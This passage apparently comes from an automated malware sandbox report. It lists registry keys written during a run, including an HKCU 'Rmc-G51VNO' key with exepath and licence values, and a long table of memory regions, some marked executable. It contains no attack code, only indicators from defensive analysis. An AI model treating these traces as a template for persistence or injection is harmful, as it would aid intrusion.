MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-G51VNO
|
exepath
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-G51VNO
|
licence
|
||
HKEY_CURRENT_USER\SOFTWARE\Rmc-G51VNO
|
time
|
There are 24 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1C3F6D21000
|
heap
|
page read and write
|
||
28801541000
|
trusted library allocation
|
page read and write
|
||
6446000
|
trusted library allocation
|
page read and write
|
||
2D3F000
|
heap
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
1C2D98C0000
|
heap
|
page read and write
|
||
1C3F5C62000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
C59A273000
|
stack
|
page read and write
|
||
27CB000
|
heap
|
page read and write
|
||
1F06AD25000
|
heap
|
page read and write
|
||
1C3F3E3A000
|
heap
|
page read and write
|
||
5BEE000
|
heap
|
page read and write
|
||
88B0000
|
heap
|
page read and write
|
||
4F50000
|
heap
|
page read and write
|
||
29F6DA00000
|
heap
|
page read and write
|
||
4A3C000
|
heap
|
page read and write
|
||
1C2DB9E4000
|
trusted library allocation
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
4BFF000
|
trusted library allocation
|
page read and write
|
||
27E5000
|
heap
|
page read and write
|
||
1F06AC50000
|
heap
|
page read and write
|
||
1F06A9B8000
|
heap
|
page read and write
|
||
1C2D984F000
|
heap
|
page read and write
|
||
28800141000
|
trusted library allocation
|
page read and write
|
||
1C3F3DC9000
|
heap
|
page read and write
|
||
1C3F5C76000
|
heap
|
page read and write
|
||
6081000
|
heap
|
page read and write
|
||
580C000
|
heap
|
page read and write
|
||
6B5B000
|
stack
|
page read and write
|
||
4A1F000
|
stack
|
page read and write
|
||
1C3F5C71000
|
heap
|
page read and write
|
||
1F068C70000
|
heap
|
page read and write
|
||
59CE000
|
heap
|
page read and write
|
||
735D000
|
stack
|
page read and write
|
||
29F6DA3A000
|
heap
|
page read and write
|
||
7F00000
|
trusted library allocation
|
page read and write
|
||
73B0000
|
trusted library allocation
|
page read and write
|
||
1F0689FF000
|
heap
|
page read and write
|
||
6B75000
|
trusted library allocation
|
page read and write
|
||
1C2F3870000
|
heap
|
page read and write
|
||
73E0000
|
trusted library allocation
|
page read and write
|
||
29F6DA1D000
|
heap
|
page read and write
|
||
4A2F000
|
heap
|
page read and write
|
||
4F31000
|
heap
|
page read and write
|
||
1F06AA55000
|
heap
|
page read and write
|
||
2D28000
|
heap
|
page read and write
|
||
4A29000
|
heap
|
page read and write
|
||
4A26000
|
heap
|
page read and write
|
||
1C3F3DF1000
|
heap
|
page read and write
|
||
1C3F3E3A000
|
heap
|
page read and write
|
||
5915000
|
heap
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
7ED0000
|
trusted library allocation
|
page execute and read and write
|
||
28AE000
|
stack
|
page read and write
|
||
2796000
|
heap
|
page read and write
|
||
1C3F3F75000
|
heap
|
page read and write
|
||
1C3F61F0000
|
heap
|
page read and write
|
||
5110000
|
heap
|
page read and write
|
||
7400000
|
trusted library allocation
|
page read and write
|
||
6116000
|
heap
|
page read and write
|
||
4DB0000
|
trusted library allocation
|
page read and write
|
||
342E000
|
stack
|
page read and write
|
||
6396000
|
trusted library allocation
|
page read and write
|
||
1C3F3DAE000
|
heap
|
page read and write
|
||
57B1000
|
heap
|
page read and write
|
||
1C2DBA23000
|
trusted library allocation
|
page read and write
|
||
1C3F64B0000
|
heap
|
page read and write
|
||
278A1FE000
|
stack
|
page read and write
|
||
1F06AE56000
|
heap
|
page read and write
|
||
1F06A932000
|
heap
|
page read and write
|
||
C59A57E000
|
stack
|
page read and write
|
||
2880824F000
|
trusted library allocation
|
page read and write
|
||
533B000
|
stack
|
page read and write
|
||
1C2F3761000
|
heap
|
page read and write
|
||
7AC0000
|
trusted library allocation
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
76DE000
|
stack
|
page read and write
|
||
29F6B9C0000
|
heap
|
page read and write
|
||
554E000
|
trusted library allocation
|
page read and write
|
||
CA0000
|
trusted library allocation
|
page read and write
|
||
29F6DA29000
|
heap
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
4D60000
|
trusted library allocation
|
page read and write
|
||
8ADE000
|
stack
|
page read and write
|
||
1C2DB8AE000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
25E5000
|
heap
|
page read and write
|
||
5BD8000
|
heap
|
page read and write
|
||
950000
|
heap
|
page read and write
|
||
765E000
|
stack
|
page read and write
|
||
7731000
|
heap
|
page read and write
|
||
29F6D9E0000
|
heap
|
page read and write
|
||
5C98000
|
heap
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
5552000
|
trusted library allocation
|
page read and write
|
||
C59A97E000
|
stack
|
page read and write
|
||
29EF000
|
stack
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
1F0689EB000
|
heap
|
page read and write
|
||
711B000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
4DDF000
|
stack
|
page read and write
|
||
1C3F6B5D000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
7215000
|
heap
|
page read and write
|
||
6115000
|
heap
|
page read and write
|
||
29F6D9B9000
|
heap
|
page read and write
|
||
491E000
|
stack
|
page read and write
|
||
1F0689FE000
|
heap
|
page read and write
|
||
1C3F5910000
|
heap
|
page read and write
|
||
1C2DB4F0000
|
trusted library allocation
|
page read and write
|
||
6F1E000
|
stack
|
page read and write
|
||
4A60000
|
heap
|
page read and write
|
||
57C6000
|
heap
|
page read and write
|
||
29F6BB0C000
|
heap
|
page read and write
|
||
2B80000
|
heap
|
page read and write
|
||
27D9000
|
heap
|
page read and write
|
||
1F068BF0000
|
heap
|
page read and write
|
||
1F06A967000
|
heap
|
page read and write
|
||
2DA8000
|
heap
|
page read and write
|
||
1C3F6CD6000
|
heap
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
C59A676000
|
stack
|
page read and write
|
||
2D5A000
|
heap
|
page read and write
|
||
1C2DBA4B000
|
trusted library allocation
|
page read and write
|
||
5210000
|
heap
|
page read and write
|
||
1C3F6D1E000
|
heap
|
page read and write
|
||
5F6E000
|
heap
|
page read and write
|
||
AE2000
|
trusted library allocation
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
74AD000
|
stack
|
page read and write
|
||
5964000
|
heap
|
page read and write
|
||
1C3F3D50000
|
heap
|
page read and write
|
||
7D50000
|
trusted library allocation
|
page read and write
|
||
2D5A000
|
heap
|
page read and write
|
||
1C2D96A0000
|
heap
|
page read and write
|
||
5BE9000
|
heap
|
page read and write
|
||
1C3F3DFC000
|
heap
|
page read and write
|
||
1C3F5FBD000
|
heap
|
page read and write
|
||
5D02000
|
heap
|
page read and write
|
||
1C3F3E2F000
|
heap
|
page read and write
|
||
62D0000
|
heap
|
page read and write
|
||
1C3F3E3A000
|
heap
|
page read and write
|
||
5DB6000
|
heap
|
page read and write
|
||
5FF0000
|
heap
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
57C6000
|
heap
|
page read and write
|
||
599A000
|
heap
|
page read and write
|
||
1F068A1B000
|
heap
|
page read and write
|
||
73D0000
|
trusted library allocation
|
page read and write
|
||
29F6F8D0000
|
trusted library allocation
|
page read and write
|
||
27E4000
|
heap
|
page read and write
|
||
6270000
|
heap
|
page read and write
|
||
1C3F3DF1000
|
heap
|
page read and write
|
||
29F6D9D7000
|
heap
|
page read and write
|
||
1C3F3D70000
|
heap
|
page read and write
|
||
5DB6000
|
heap
|
page read and write
|
||
1C3F3E27000
|
heap
|
page read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
2789D1E000
|
stack
|
page read and write
|
||
5955000
|
heap
|
page read and write
|
||
1F0689A0000
|
heap
|
page read and write
|
||
49A0000
|
heap
|
page execute and read and write
|
||
4CCD000
|
stack
|
page read and write
|
||
71E6000
|
heap
|
page read and write
|
||
1C3F5C73000
|
heap
|
page read and write
|
||
2FDF000
|
stack
|
page read and write
|
||
1F068BF4000
|
heap
|
page read and write
|
||
4F3F000
|
heap
|
page read and write
|
||
1C2F3781000
|
heap
|
page read and write
|
||
4D95000
|
trusted library allocation
|
page execute and read and write
|
||
21BB000
|
stack
|
page read and write
|
||
2860000
|
heap
|
page read and write
|
||
1C3F6CE6000
|
heap
|
page read and write
|
||
9329000
|
trusted library allocation
|
page read and write
|
||
1F06AA51000
|
heap
|
page read and write
|
||
4F48000
|
heap
|
page read and write
|
||
7012000
|
heap
|
page read and write
|
||
2F8C000
|
stack
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
1F06A957000
|
heap
|
page read and write
|
||
1C2DB4F5000
|
trusted library allocation
|
page read and write
|
||
1F06A956000
|
heap
|
page read and write
|
||
555B000
|
trusted library allocation
|
page read and write
|
||
1C3F3E64000
|
heap
|
page read and write
|
||
1C3F6B36000
|
heap
|
page read and write
|
||
4A23000
|
heap
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
1C3F6B1C000
|
heap
|
page read and write
|
||
1F06A967000
|
heap
|
page read and write
|
||
57B0000
|
heap
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
581F000
|
heap
|
page read and write
|
||
C59A5FD000
|
stack
|
page read and write
|
||
5F81000
|
heap
|
page read and write
|
||
1C3F5F75000
|
heap
|
page read and write
|
||
5845000
|
heap
|
page read and write
|
||
4340000
|
heap
|
page read and write
|
||
26F8000
|
heap
|
page read and write
|
||
1C2DB8CE000
|
trusted library allocation
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
29F6D8D0000
|
heap
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
C59A8FF000
|
stack
|
page read and write
|
||
3030000
|
heap
|
page read and write
|
||
495F000
|
stack
|
page read and write
|
||
5999000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
34EE000
|
heap
|
page read and write
|
||
78CE000
|
stack
|
page read and write
|
||
1C3F5C65000
|
heap
|
page read and write
|
||
51C0000
|
trusted library allocation
|
page read and write
|
||
28800B41000
|
trusted library allocation
|
page read and write
|
||
540B000
|
stack
|
page read and write
|
||
5F82000
|
heap
|
page read and write
|
||
581F000
|
heap
|
page read and write
|
||
4F2F000
|
stack
|
page read and write
|
||
7120000
|
heap
|
page read and write
|
||
2BF0000
|
direct allocation
|
page read and write
|
||
4D92000
|
trusted library allocation
|
page read and write
|
||
4A180FE000
|
stack
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
584BAFF000
|
stack
|
page read and write
|
||
5CF4000
|
heap
|
page read and write
|
||
1C2F3785000
|
heap
|
page read and write
|
||
5CF6000
|
heap
|
page read and write
|
||
62E0000
|
heap
|
page read and write
|
||
58E0000
|
heap
|
page read and write
|
||
27D9000
|
heap
|
page read and write
|
||
6C70000
|
heap
|
page read and write
|
||
1C3F3F80000
|
heap
|
page read and write
|
||
2CD2000
|
heap
|
page read and write
|
||
2CD2000
|
heap
|
page read and write
|
||
6DDB000
|
stack
|
page read and write
|
||
34C9000
|
heap
|
page read and write
|
||
5915000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
27E2000
|
heap
|
page read and write
|
||
D2C000
|
stack
|
page read and write
|
||
29F6D9D0000
|
heap
|
page read and write
|
||
5A38000
|
trusted library allocation
|
page read and write
|
||
27D9000
|
heap
|
page read and write
|
||
54C0000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
7380000
|
trusted library allocation
|
page read and write
|
||
5902000
|
heap
|
page read and write
|
||
1C3F6700000
|
heap
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
29F6DA31000
|
heap
|
page read and write
|
||
1C2EB4B0000
|
trusted library allocation
|
page read and write
|
||
5260000
|
trusted library allocation
|
page read and write
|
||
28802941000
|
trusted library allocation
|
page read and write
|
||
5BF4000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
A78000
|
heap
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
581F000
|
heap
|
page read and write
|
||
4A58000
|
heap
|
page read and write
|
||
29F6DDA5000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
5053000
|
heap
|
page read and write
|
||
27E9000
|
heap
|
page read and write
|
||
5796000
|
heap
|
page read and write
|
||
1C3F5FEE000
|
heap
|
page read and write
|
||
1C3F6B10000
|
heap
|
page read and write
|
||
5804000
|
heap
|
page read and write
|
||
58E4000
|
heap
|
page read and write
|
||
1F06A980000
|
heap
|
page read and write
|
||
2762000
|
heap
|
page read and write
|
||
5827000
|
heap
|
page read and write
|
||
29F6BCA0000
|
heap
|
page read and write
|
||
5548000
|
trusted library allocation
|
page read and write
|
||
1C3F3DD7000
|
heap
|
page read and write
|
||
25E0000
|
heap
|
page read and write
|
||
272E000
|
heap
|
page read and write
|
||
D9793FF000
|
stack
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
4A5E000
|
heap
|
page read and write
|
||
5987000
|
heap
|
page read and write
|
||
5790000
|
heap
|
page read and write
|
||
5DBA000
|
heap
|
page read and write
|
||
731E000
|
stack
|
page read and write
|
||
1C2DB4C5000
|
trusted library allocation
|
page read and write
|
||
7AD0000
|
heap
|
page execute and read and write
|
||
7BB1000
|
heap
|
page read and write
|
||
1C2DB4A1000
|
trusted library allocation
|
page read and write
|
||
58F7000
|
heap
|
page read and write
|
||
5788000
|
heap
|
page read and write
|
||
4A2C000
|
heap
|
page read and write
|
||
57C8000
|
heap
|
page read and write
|
||
5DCB000
|
heap
|
page read and write
|
||
CB0000
|
trusted library allocation
|
page read and write
|
||
1F06A997000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
1C3F5CA7000
|
heap
|
page read and write
|
||
35B4000
|
heap
|
page read and write
|
||
1F06A957000
|
heap
|
page read and write
|
||
6B61000
|
trusted library allocation
|
page read and write
|
||
71E8000
|
heap
|
page read and write
|
||
1C2D97B5000
|
heap
|
page read and write
|
||
6A8E000
|
stack
|
page read and write
|
||
23CD000
|
stack
|
page read and write
|
||
B59000
|
heap
|
page read and write
|
||
5845000
|
heap
|
page read and write
|
||
80DF000
|
stack
|
page read and write
|
||
4F3F000
|
heap
|
page read and write
|
||
28F0000
|
heap
|
page read and write
|
||
28803D41000
|
trusted library allocation
|
page read and write
|
||
4A40000
|
heap
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
2CD1000
|
heap
|
page read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
35B7000
|
heap
|
page read and write
|
||
537C000
|
trusted library allocation
|
page read and write
|
||
1F06A97B000
|
heap
|
page read and write
|
||
1C3F3E64000
|
heap
|
page read and write
|
||
2CE1000
|
heap
|
page read and write
|
||
5D36000
|
heap
|
page read and write
|
||
6A4D000
|
stack
|
page read and write
|
||
6083000
|
heap
|
page read and write
|
||
C19000
|
heap
|
page read and write
|
||
29F6DCD1000
|
heap
|
page read and write
|
||
2FC7000
|
stack
|
page read and write
|
||
761A000
|
stack
|
page read and write
|
||
1C3F5C82000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
2CFC000
|
heap
|
page read and write
|
||
1C2DB911000
|
trusted library allocation
|
page read and write
|
||
2880825B000
|
trusted library allocation
|
page read and write
|
||
27E4000
|
heap
|
page read and write
|
||
29F6BBB0000
|
heap
|
page read and write
|
||
1C3F600E000
|
heap
|
page read and write
|
||
C59A4FF000
|
stack
|
page read and write
|
||
581D000
|
heap
|
page read and write
|
||
1C3F5FBD000
|
heap
|
page read and write
|
||
1C3F60F0000
|
heap
|
page read and write
|
||
4A34000
|
heap
|
page read and write
|
||
5ACF000
|
stack
|
page read and write
|
||
2796000
|
heap
|
page read and write
|
||
5530000
|
heap
|
page read and write
|
||
8CD6000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page execute and read and write
|
||
5FC5000
|
heap
|
page read and write
|
||
1C3F5F8C000
|
heap
|
page read and write
|
||
49C0000
|
heap
|
page execute and read and write
|
||
1C3F6CE3000
|
heap
|
page read and write
|
||
1C2D9872000
|
heap
|
page read and write
|
||
246E76D0000
|
heap
|
page read and write
|
||
1C2D9809000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
1C3F5C8D000
|
heap
|
page read and write
|
||
7740000
|
heap
|
page read and write
|
||
6F9E000
|
stack
|
page read and write
|
||
246E776B000
|
heap
|
page read and write
|
||
1C3F3D9E000
|
heap
|
page read and write
|
||
2746000
|
heap
|
page read and write
|
||
54E0000
|
heap
|
page read and write
|
||
1C3F3DF1000
|
heap
|
page read and write
|
||
5DDA000
|
heap
|
page read and write
|
||
1C3F3DFA000
|
heap
|
page read and write
|
||
2C8F000
|
stack
|
page read and write
|
||
73F0000
|
trusted library allocation
|
page read and write
|
||
1C2DB5C6000
|
trusted library allocation
|
page read and write
|
||
1F06A9B8000
|
heap
|
page read and write
|
||
4F3C000
|
heap
|
page read and write
|
||
714B000
|
heap
|
page read and write
|
||
2CB8000
|
heap
|
page read and write
|
||
4A40000
|
heap
|
page read and write
|
||
27C9000
|
heap
|
page read and write
|
||
2D46000
|
heap
|
page read and write
|
||
2CB0000
|
heap
|
page read and write
|
||
5808000
|
heap
|
page read and write
|
||
5F9C000
|
heap
|
page read and write
|
||
51D0000
|
trusted library allocation
|
page read and write
|
||
56C000
|
stack
|
page read and write
|
||
5DB6000
|
heap
|
page read and write
|
||
51F0000
|
heap
|
page read and write
|
||
4F34000
|
heap
|
page read and write
|
||
7BE2000
|
heap
|
page read and write
|
||
C59A37E000
|
stack
|
page read and write
|
||
5BD1000
|
heap
|
page read and write
|
||
5BD1000
|
heap
|
page read and write
|
||
1C3F5C8E000
|
heap
|
page read and write
|
||
798F000
|
stack
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
353E000
|
heap
|
page read and write
|
||
1C2F3C70000
|
heap
|
page read and write
|
||
CF17FFF000
|
stack
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
27E7000
|
heap
|
page read and write
|
||
4A20000
|
heap
|
page read and write
|
||
584B9FF000
|
stack
|
page read and write
|
||
1C3F6C18000
|
heap
|
page read and write
|
||
29F6DA23000
|
heap
|
page read and write
|
||
1F0689F0000
|
heap
|
page read and write
|
||
1C2F36AF000
|
heap
|
page read and write
|
||
5792000
|
heap
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
29F6BBD0000
|
heap
|
page read and write
|
||
4A2F000
|
heap
|
page read and write
|
||
28808341000
|
trusted library allocation
|
page read and write
|
||
5D77000
|
heap
|
page read and write
|
||
1C3F6B87000
|
heap
|
page read and write
|
||
1C3F5C7A000
|
heap
|
page read and write
|
||
5999000
|
heap
|
page read and write
|
||
8B71000
|
trusted library allocation
|
page read and write
|
||
7D60000
|
trusted library allocation
|
page read and write
|
||
4F4C000
|
heap
|
page read and write
|
||
29F6D9B0000
|
heap
|
page read and write
|
||
5D37000
|
heap
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
1C3F5F54000
|
heap
|
page read and write
|
||
1C3F5FAC000
|
heap
|
page read and write
|
||
8A90000
|
heap
|
page read and write
|
||
D9792FF000
|
stack
|
page read and write
|
||
1F06A9A3000
|
heap
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
4CDE000
|
stack
|
page read and write
|
||
1F0689D8000
|
heap
|
page read and write
|
||
1C3F5C8D000
|
heap
|
page read and write
|
||
2A9E000
|
stack
|
page read and write
|
||
C8E000
|
stack
|
page read and write
|
||
5955000
|
heap
|
page read and write
|
||
73DD000
|
stack
|
page read and write
|
||
1C3F3DF5000
|
heap
|
page read and write
|
||
AB3000
|
trusted library allocation
|
page execute and read and write
|
||
29F6D9E7000
|
heap
|
page read and write
|
||
26EB000
|
stack
|
page read and write
|
||
6133000
|
heap
|
page read and write
|
||
1F06A925000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
2570000
|
heap
|
page read and write
|
||
2738000
|
heap
|
page read and write
|
||
1C3F6BD3000
|
heap
|
page read and write
|
||
1C2DBAA2000
|
trusted library allocation
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
1C3F5F5E000
|
heap
|
page read and write
|
||
1C3F5FF0000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
57AC000
|
heap
|
page read and write
|
||
9327000
|
trusted library allocation
|
page read and write
|
||
1C3F5C61000
|
heap
|
page read and write
|
||
7EE0000
|
heap
|
page read and write
|
||
1C3F6CD3000
|
heap
|
page read and write
|
||
8880000
|
trusted library allocation
|
page execute and read and write
|
||
C90000
|
heap
|
page readonly
|
||
48DF000
|
stack
|
page read and write
|
||
4D6D000
|
trusted library allocation
|
page execute and read and write
|
||
2A50000
|
heap
|
page read and write
|
||
1C2DB60B000
|
trusted library allocation
|
page read and write
|
||
29F6DA38000
|
heap
|
page read and write
|
||
6002000
|
heap
|
page read and write
|
||
1C3F6D1E000
|
heap
|
page read and write
|
||
1C2DB460000
|
heap
|
page readonly
|
||
820000
|
heap
|
page read and write
|
||
4A41000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
4E5E000
|
stack
|
page read and write
|
||
5F77000
|
heap
|
page read and write
|
||
AD7000
|
trusted library allocation
|
page execute and read and write
|
||
1C3F5C6E000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
491E000
|
stack
|
page read and write
|
||
1F068A0A000
|
heap
|
page read and write
|
||
C59B4CD000
|
stack
|
page read and write
|
||
2789C93000
|
stack
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
58D5000
|
heap
|
page read and write
|
||
7240000
|
trusted library allocation
|
page execute and read and write
|
||
1C3F5C8D000
|
heap
|
page read and write
|
||
1C3F6C4F000
|
heap
|
page read and write
|
||
1C2DB8F0000
|
trusted library allocation
|
page read and write
|
||
29F6DA0B000
|
heap
|
page read and write
|
||
58E5000
|
heap
|
page read and write
|
||
6260000
|
heap
|
page read and write
|
||
2D46000
|
heap
|
page read and write
|
||
1C2DB110000
|
heap
|
page read and write
|
||
5959000
|
heap
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
1C3F6D14000
|
heap
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
29F6BAEA000
|
heap
|
page read and write
|
||
4F33000
|
heap
|
page read and write
|
||
B7E000
|
heap
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
4F6F000
|
heap
|
page read and write
|
||
7DB0000
|
trusted library allocation
|
page read and write
|
||
1F068AD0000
|
heap
|
page read and write
|
||
4F72000
|
heap
|
page read and write
|
||
6081000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page execute and read and write
|
||
5CF4000
|
heap
|
page read and write
|
||
2D8D000
|
heap
|
page read and write
|
||
1C2DB0F0000
|
trusted library allocation
|
page read and write
|
||
4F3F000
|
heap
|
page read and write
|
||
2880BD54000
|
trusted library allocation
|
page read and write
|
||
7BDE000
|
heap
|
page read and write
|
||
1C3F61E0000
|
heap
|
page read and write
|
||
29F6D9FB000
|
heap
|
page read and write
|
||
5999000
|
heap
|
page read and write
|
||
1C2D97E8000
|
heap
|
page read and write
|
||
29F6BC30000
|
heap
|
page read and write
|
||
B8B000
|
heap
|
page read and write
|
||
1C3F3E24000
|
heap
|
page read and write
|
||
C59A6F9000
|
stack
|
page read and write
|
||
1C3F600E000
|
heap
|
page read and write
|
||
4D87000
|
trusted library allocation
|
page execute and read and write
|
||
5F60000
|
heap
|
page read and write
|
||
5827000
|
heap
|
page read and write
|
||
1C3F5EB0000
|
remote allocation
|
page read and write
|
||
8CAC000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
7DA3000
|
trusted library allocation
|
page read and write
|
||
4B22000
|
trusted library allocation
|
page read and write
|
||
609E000
|
heap
|
page read and write
|
||
8890000
|
heap
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
C59A3FE000
|
stack
|
page read and write
|
||
1C2DBBBB000
|
trusted library allocation
|
page read and write
|
||
717A000
|
heap
|
page read and write
|
||
1C3F3F40000
|
heap
|
page read and write
|
||
29F6DED4000
|
heap
|
page read and write
|
||
1C3F5F5C000
|
heap
|
page read and write
|
||
7C6E000
|
stack
|
page read and write
|
||
74EB000
|
stack
|
page read and write
|
||
543C000
|
stack
|
page read and write
|
||
57C8000
|
heap
|
page read and write
|
||
5F81000
|
heap
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
28EF000
|
stack
|
page read and write
|
||
27C9000
|
heap
|
page read and write
|
||
581F000
|
heap
|
page read and write
|
||
5C74000
|
heap
|
page read and write
|
||
2D27000
|
heap
|
page read and write
|
||
5793000
|
heap
|
page read and write
|
||
278A2FE000
|
stack
|
page read and write
|
||
7420000
|
trusted library allocation
|
page read and write
|
||
5915000
|
heap
|
page read and write
|
||
1C3F5F10000
|
heap
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page read and write
|
||
29F6D9F0000
|
heap
|
page read and write
|
||
5804000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
1C2DB915000
|
trusted library allocation
|
page read and write
|
||
1C3F6310000
|
heap
|
page read and write
|
||
2FCD000
|
stack
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
6001000
|
heap
|
page read and write
|
||
1C2F36C0000
|
heap
|
page read and write
|
||
29F6DAD5000
|
heap
|
page read and write
|
||
1C3F5C7E000
|
heap
|
page read and write
|
||
1C3F3E31000
|
heap
|
page read and write
|
||
1C3F5FEE000
|
heap
|
page read and write
|
||
4A3A000
|
heap
|
page read and write
|
||
1C3F5C8D000
|
heap
|
page read and write
|
||
AB4000
|
trusted library allocation
|
page read and write
|
||
1C3F5C7C000
|
heap
|
page read and write
|
||
2760000
|
heap
|
page read and write
|
||
5AD000
|
stack
|
page read and write
|
||
1C3F5F54000
|
heap
|
page read and write
|
||
4F51000
|
heap
|
page read and write
|
||
4A2B000
|
heap
|
page read and write
|
||
27E8000
|
stack
|
page read and write
|
||
885E000
|
stack
|
page read and write
|
||
AC9000
|
trusted library allocation
|
page read and write
|
||
1C3F5C6E000
|
heap
|
page read and write
|
||
6066000
|
heap
|
page read and write
|
||
4F39000
|
heap
|
page read and write
|
||
1C2DB116000
|
heap
|
page read and write
|
||
2D24000
|
heap
|
page read and write
|
||
794E000
|
stack
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
29F6D9B9000
|
heap
|
page read and write
|
||
CC0000
|
trusted library allocation
|
page execute and read and write
|
||
1C3F3E24000
|
heap
|
page read and write
|
||
7F10000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
heap
|
page read and write
|
||
1F0688C0000
|
heap
|
page read and write
|
||
59CE000
|
heap
|
page read and write
|
||
5A46000
|
trusted library allocation
|
page read and write
|
||
5DBE000
|
heap
|
